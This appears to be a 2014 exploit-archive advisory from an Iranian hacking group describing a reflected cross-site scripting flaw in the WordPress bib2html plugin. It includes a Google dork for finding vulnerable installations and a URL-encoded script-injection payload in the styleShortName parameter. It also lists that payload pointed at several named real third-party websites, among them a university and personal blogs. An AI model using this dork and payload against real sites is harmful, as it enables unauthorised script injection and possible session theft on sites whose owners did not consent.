|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| | [*] Exploit Title: Wordpress bib2html Cross site scripting Vulnerability | | [*] Exploit Author: Ashiyane Digital Security Team | | [*] Date : Date: 2014-05-22 | | [*] Vendor Homepage : http://www.wordpress.org | | [*] Software Link : http://downloads.wordpress.org/plugin/bib2html.0.9.3.zip | | [*] Google Dork: inurl:wp-content/plugins/bib2html | | [*] Tested on: Windows 7 | | [*] Web browser : mozilla firefox |-------------------------------------------------------------------------| | | [*] Location : [localhost]/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=[XSS] | |-------------------------------------------------------------------------| | [*] Proof: | | [*] hhttp://www.adamwesterski.com/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | | [*] http://www.adamwesterski.com/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | | [*] http://doc.gold.ac.uk/mutators/wp/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | | [*] http://recursostic.javeriana.edu.co/narratopedia/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | | [*] http://blog.aleph0.info/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E |-------------------------------------------------------------------------| | [*] Discovered By : ACC3SS |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|